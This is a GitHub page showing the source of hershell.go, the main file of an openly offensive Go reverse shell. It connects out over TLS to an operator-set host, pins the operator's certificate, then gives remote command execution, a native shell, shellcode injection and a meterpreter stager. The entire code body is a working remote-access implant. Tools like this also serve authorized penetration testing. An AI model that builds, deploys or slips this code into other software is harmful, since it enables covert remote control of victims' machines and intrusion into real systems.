-
Notifications
You must be signed in to change notification settings - Fork 86
/
Copy pathhershell.go
123 lines (108 loc) · 2.41 KB
/
hershell.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
package main
import (
"bufio"
"bytes"
"crypto/sha256"
"crypto/tls"
"encoding/hex"
"net"
"os"
"os/exec"
"strings"
"github.com/sysdream/hershell/meterpreter"
"github.com/sysdream/hershell/shell"
)
const (
ERR_COULD_NOT_DECODE = 1 << iota
ERR_HOST_UNREACHABLE = iota
ERR_BAD_FINGERPRINT = iota
)
var (
connectString string
fingerPrint string
)
func InteractiveShell(conn net.Conn) {
var (
exit bool = false
prompt string = "[hershell]> "
scanner *bufio.Scanner = bufio.NewScanner(conn)
)
conn.Write([]byte(prompt))
for scanner.Scan() {
command := scanner.Text()
if len(command) > 1 {
argv := strings.Split(command, " ")
switch argv[0] {
case "meterpreter":
if len(argv) > 2 {
transport := argv[1]
address := argv[2]
ok, err := meterpreter.Meterpreter(transport, address)
if !ok {
conn.Write([]byte(err.Error() + "\n"))
}
} else {
conn.Write([]byte("Usage: meterpreter [tcp|http|https] IP:PORT\n"))
}
case "inject":
if len(argv) > 1 {
shell.InjectShellcode(argv[1])
}
case "exit":
exit = true
case "run_shell":
conn.Write([]byte("Enjoy your native shell\n"))
RunShell(conn)
default:
shell.ExecuteCmd(command, conn)
}
if exit {
break
}
}
conn.Write([]byte(prompt))
}
}
func RunShell(conn net.Conn) {
var cmd *exec.Cmd = shell.GetShell()
cmd.Stdout = conn
cmd.Stderr = conn
cmd.Stdin = conn
cmd.Run()
}
func CheckKeyPin(conn *tls.Conn, fingerprint []byte) (bool, error) {
valid := false
connState := conn.ConnectionState()
for _, peerCert := range connState.PeerCertificates {
hash := sha256.Sum256(peerCert.Raw)
if bytes.Compare(hash[0:], fingerprint) == 0 {
valid = true
}
}
return valid, nil
}
func Reverse(connectString string, fingerprint []byte) {
var (
conn *tls.Conn
err error
)
config := &tls.Config{InsecureSkipVerify: true}
if conn, err = tls.Dial("tcp", connectString, config); err != nil {
os.Exit(ERR_HOST_UNREACHABLE)
}
defer conn.Close()
if ok, err := CheckKeyPin(conn, fingerprint); err != nil || !ok {
os.Exit(ERR_BAD_FINGERPRINT)
}
InteractiveShell(conn)
}
func main() {
if connectString != "" && fingerPrint != "" {
fprint := strings.Replace(fingerPrint, ":", "", -1)
bytesFingerprint, err := hex.DecodeString(fprint)
if err != nil {
os.Exit(ERR_COULD_NOT_DECODE)
}
Reverse(connectString, bytesFingerprint)
}
}